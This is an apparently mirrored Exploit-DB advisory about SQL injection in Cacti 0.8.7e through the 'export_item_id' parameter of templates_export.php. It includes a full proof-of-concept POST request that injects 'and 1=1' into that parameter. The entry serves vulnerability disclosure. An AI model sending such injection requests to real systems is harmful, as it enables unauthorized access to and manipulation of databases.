bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/12338.txt
Offensive Security d63de06c7a DB: 2022-11-10 
2776 changes to exploits/shellcodes/ghdb
2022-11-10 16:39:50 +00:00

28 lines
No EOL
1.4 KiB
Text
Raw Permalink Blame History

CVSSv2 Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
A Vulnerability has been discovered in Cacti, which can be exploited by any
user to conduct SQL Injection attacks.
Input passed via the “export_item_id” parameter to “templates_export.php”
script is not properly sanitized before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL
code.
The following is a Proof of Concept POST request:
POST /cacti-0.8.7e/templates_export.php HTTP/1.1
Host: 192.168.1.107
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://192.168.1.107/cacti-0.8.7e/templates_export.php
Cookie: Cacti=563bb99868dfa24cc70982bf80c5c03e
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
export_item_id=18 and 1=1&include_deps=on&output_format=3&export_type=graph_template&save_component_export=1&action=save&x=24&y=12
===========================================================================
Download:
===========================================================================
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12338.pdf (Bonsai-SQL_Injection_in_Cacti.pdf)
<Bonsai Information Security Advisories>
http://www.bonsai-sec.com/en/research/vulnerability.php
Reference in a new issue View git blame Copy permalink